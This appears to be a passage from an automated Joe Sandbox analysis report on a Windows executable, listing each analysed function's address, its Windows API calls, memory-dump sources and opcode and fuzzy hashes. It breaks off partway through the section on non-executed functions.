Opcode Fuzzy Hash: 368be218c748982eed7d6e0df212b9fe994551d7ff399b0ce0bbae5c03d9a8e5
Instruction Fuzzy Hash: 9B318FB1609701DFD720DF24D884797BBECFB89708F00496EF99983290E771AA44DB52

Function 0090B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0090BB4E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: ea1e22b3139d8bee6cf5b9fe636389b514053e0feb9b97a689655065c89b2993
Instruction ID: 69d1bc1afd5451ce9e5d2676f3303e21e2eab081b973295bf416da52dad40f0d
Opcode Fuzzy Hash: ea1e22b3139d8bee6cf5b9fe636389b514053e0feb9b97a689655065c89b2993
Instruction Fuzzy Hash: A532DC35A04209EFDB20CF54C894BBEB7B9EF84304F14805AED15AB2A1D778ED85CB91

Function 017EFB38 Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 017EF3A8: GetFileAttributesW.KERNELBASE(?), ref: 017EF3B3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 017EFCAF

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 0c2a8046d3c00b475e13b5b63dc1039dbf2d99e5ee2ec3436250039fc924af8d
Instruction ID: 00e12307266b6d7d8cee9aba4352a4641ed07e69b920b9c5b61a0c2a809a388c
Opcode Fuzzy Hash: 0c2a8046d3c00b475e13b5b63dc1039dbf2d99e5ee2ec3436250039fc924af8d
Instruction Fuzzy Hash: 6661A531A1020996EF14EFB0C858BEFB379EF58300F004569E60DEB694EB769B44C7A5

Function 0091FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0091FD1F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 2f3df5c0abab29cdaff28f5abae2599afd689bfa8cb0263096c13bd9e1ab7319
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6331F579B0010DDBC718DF59E4A09A9F7A5FF89300B2486A5E84ACB655D731EDC1DBC0

Function 00904ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00904E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00904EDD,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E9C
Part of subcall function 00904E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00904EAE
Part of subcall function 00904E90: FreeLibrary.KERNEL32(00000000,?,?,00904EDD,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904EFD

Part of subcall function 00904E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00943CDE,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E62
Part of subcall function 00904E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00904E74
Part of subcall function 00904E59: FreeLibrary.KERNEL32(00000000,?,?,00943CDE,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904E87

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 6b1fda652583d7080cf631c5bdbc0bd18cb77b3ab86dfd72407bb7ce4f35fa77
Instruction ID: 2dd32728a7207bb1055976dbfdf76ae1d3b43d81e02ae37ece3d7d2c865c31b8
Opcode Fuzzy Hash: 6b1fda652583d7080cf631c5bdbc0bd18cb77b3ab86dfd72407bb7ce4f35fa77
Instruction Fuzzy Hash: 5611E3B2610206AEDF14BB74DC52FAD77A5AF80711F10882EF642A61C1EEB49E05AB50

Function 00938402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00938440

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: fffb719ff1bfa2ec6d616bcdf563b7f0d64ce87da9f5d3577451cf4c6461edd1
Instruction ID: 50cb4dc3f544eb2b195913d96d258553dc28b13371a333c40a08f95c2298555f
Opcode Fuzzy Hash: fffb719ff1bfa2ec6d616bcdf563b7f0d64ce87da9f5d3577451cf4c6461edd1
Instruction Fuzzy Hash: 7511187590820AAFCF15DF58E945A9B7BF9EF88314F104059F808AB312DB31DA11CBA5

Function 00935000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00934C7D: RtlAllocateHeap.NTDLL(00000008,00901129,00000000,?,00932E29,00000001,00000364,?,?,?,0092F2DE,00933863,009D1444,?,0091FDF5,?), ref: 00934CBE

_free.LIBCMT ref: 0093506C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: a9d172714781a9def1e72bb0560facddb6ac966d942085ff1b09c797e0c3f8f9
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: CA0149722047046BE3358F65D885A9AFBECFBC9370F26051DE188932C0EA31A805CBB4

Function 0092E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 859460675fd82458179797a8b6340d9190007162100f1a5b36e5fb73646105e3
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 22F02836511A3497C7313A69BC15B5B339C9FD2335F100B25F421971D6DB78E8018AA5

Function 00934C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00901129,00000000,?,00932E29,00000001,00000364,?,?,?,0092F2DE,00933863,009D1444,?,0091FDF5,?), ref: 00934CBE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aec8bd98a2aef87ce18279ebc4969903f90950d84d9d8681409912f372ce8af5
Instruction ID: c0ed3e085ad9f5fce29f80d793eaa45f62a4b7b5c2fc9aaefb04cf746ae8a737
Opcode Fuzzy Hash: aec8bd98a2aef87ce18279ebc4969903f90950d84d9d8681409912f372ce8af5
Instruction Fuzzy Hash: A3F0E93164723467DB215F62AD05BDA378CFF817A0F179122F895A6195CA70FC015EE0

Function 00933820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6,?,00901129), ref: 00933852

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5403008958b696ef92e501af6d204fed954141df10d382b57c92f2df09307cf3
Instruction ID: 9b98a5695d5e133f4b3618f781b4c1eec239de495356519e4c43d07eb30d4d20
Opcode Fuzzy Hash: 5403008958b696ef92e501af6d204fed954141df10d382b57c92f2df09307cf3
Instruction Fuzzy Hash: 90E02B31185234A6F7312A77AC00B9B375CAF827B0F058031FC15928A0CB10DD0189E4

Function 00904F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904F6D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 2427b8902f60f19321d4e445bc9fd7efc8abbfb6d0e84d20e092d77da63403bd
Instruction ID: fefa5d932a13053b8fd57d001c12acb7867200bb6d986aca34fac9e16fdd40ed
Opcode Fuzzy Hash: 2427b8902f60f19321d4e445bc9fd7efc8abbfb6d0e84d20e092d77da63403bd
Instruction Fuzzy Hash: 84F039B1109752CFDB349F64E890822BBE8EF143293208D7EE3EA82661C7319884DF50

Function 00902DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00902DC4

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: a83e2915313cb04e6d67ad57bdddb34f27fb304417c7cc6845a6ed924cebbc38
Instruction ID: 733b34ec7d5b5444594a5b507370fca3ff82a0b1926d2acc95cee037436e582e
Opcode Fuzzy Hash: a83e2915313cb04e6d67ad57bdddb34f27fb304417c7cc6845a6ed924cebbc38
Instruction Fuzzy Hash: 22E0C2B2A042245BCB20E7989C06FEA77EDDFC8790F0400B2FD09E7248DA60ED848690

Function 00972693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009726B5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 89e36d5a751a750e0f5f752b813309b2a53b5f0d22d2efb47a0d8f692c1215b6
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: FEE04FB1609B005FDF3D9B28A8517B677E89F49300F00486FF69F82256E57278458A4D

Function 00902B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00903837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00903908

Part of subcall function 0090D730: GetInputState.USER32 ref: 0090D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00902B6B

Part of subcall function 009030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0090314E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: ab2e555dfaeb241a59c1adad440d103511d88b9be4dae687ba8e29cfb128b7fb
Instruction ID: 91d9c405540922705ac72f38702a1078cfee2535503ce637e92ed847b88f0b08
Opcode Fuzzy Hash: ab2e555dfaeb241a59c1adad440d103511d88b9be4dae687ba8e29cfb128b7fb
Instruction Fuzzy Hash: 63E086623052441FC604BBB4985677DB75D9BD1351F40953FF546832F3CE2445454251

Function 017EF3A8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 017EF3B3

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 71dec063ceaa31d14930e3d503841206c6218c092eef5ea0c21ac6f1770f515c
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 01E08C30A0920CEBDB20CAA8C908AADB3E8AB08321F008696E906C3680D5728A10D751

Function 0094039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00940704,?,?,00000000,?,00940704,00000000,0000000C), ref: 009403B7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7ba493661a5263a2f67a518ef47b84b99eecd5ed74f77c999de9e4e66f3056ae
Instruction ID: bcac4db9b7520034beeaf79656945ae5ac35fe1200b5e5cbcedaa51bd8806d16
Opcode Fuzzy Hash: 7ba493661a5263a2f67a518ef47b84b99eecd5ed74f77c999de9e4e66f3056ae
Instruction Fuzzy Hash: 07D06C3205410DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E821AB94

Function 017EF378 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 017EF383

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 3ef79850db45197678f96583d5bac8bc2b86f832f67d45ce4a1966b0dd7bbc21
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 06D05E7090520CABCB10CAAC990899DB3E89709321F0047A5E91583680D5319A009750

Function 00901CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00901CBC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 14d6e782cc8555c3dd7ddeef021cf29ba30af7211bd2bb0d1df5590da50d9117
Instruction ID: 31eb21f4525bb1c0c2d997eeb9d7891b8193709aaeb486ae98da13439ac60dfb
Opcode Fuzzy Hash: 14d6e782cc8555c3dd7ddeef021cf29ba30af7211bd2bb0d1df5590da50d9117
Instruction Fuzzy Hash: 6EC09B362DD304AFF3144B84BC4AF107754A358B00F444003F609555E3C3A11450F651

Function 017F0DA4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017F0DB9

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 3b639dd2751c170cb7ca7e7493a1fa752bf3529376d69d5d7e67d33b664fef71
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: B4E0BF7494110DEFDB00DFA4D5496DE7BB4EF04301F1005A5FD05E7681DB309E548A62

Function 017F0DA8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017F0DB9

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2edbe572f431452cee03f83bea6c0edc0f6f0dfa460bcba4eae6dcaff9c83490
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: FEE0E67494110DDFDB00DFB4D54969E7BB4EF04301F100165FD01E2381D6309D508A62

Non-executed Functions

Function 00999576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0099961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0099969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009996C9
SendMessageW.USER32 ref: 009996F2
GetKeyState.USER32(00000011), ref: 0099978B
GetKeyState.USER32(00000009), ref: 00999798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009997AE
GetKeyState.USER32(00000010), ref: 009997B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009997E9
SendMessageW.USER32 ref: 00999810
SendMessageW.USER32(?,00001030,?,00997E95), ref: 00999918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0099992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00999941
SetCapture.USER32(?), ref: 0099994A
ClientToScreen.USER32(?,?), ref: 009999AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009999BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009999D6
ReleaseCapture.USER32 ref: 009999E1
GetCursorPos.USER32(?), ref: 00999A19
ScreenToClient.USER32(?,?), ref: 00999A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00999A80
SendMessageW.USER32 ref: 00999AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00999AEB
SendMessageW.USER32 ref: 00999B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00999B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00999B4A
GetCursorPos.USER32(?), ref: 00999B68
ScreenToClient.USER32(?,?), ref: 00999B75
GetParent.USER32(?), ref: 00999B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00999BFA
SendMessageW.USER32 ref: 00999C2B
ClientToScreen.USER32(?,?), ref: 00999C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00999CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00999CDE
SendMessageW.USER32 ref: 00999D01
ClientToScreen.USER32(?,?), ref: 00999D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00999D82

Part of subcall function 00919944: GetWindowLongW.USER32(?,000000EB), ref: 00919952

GetWindowLongW.USER32(?,000000F0), ref: 00999E05

Strings

F, xrefs: 00999D07
@GUI_DRAGID, xrefs: 0099997D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
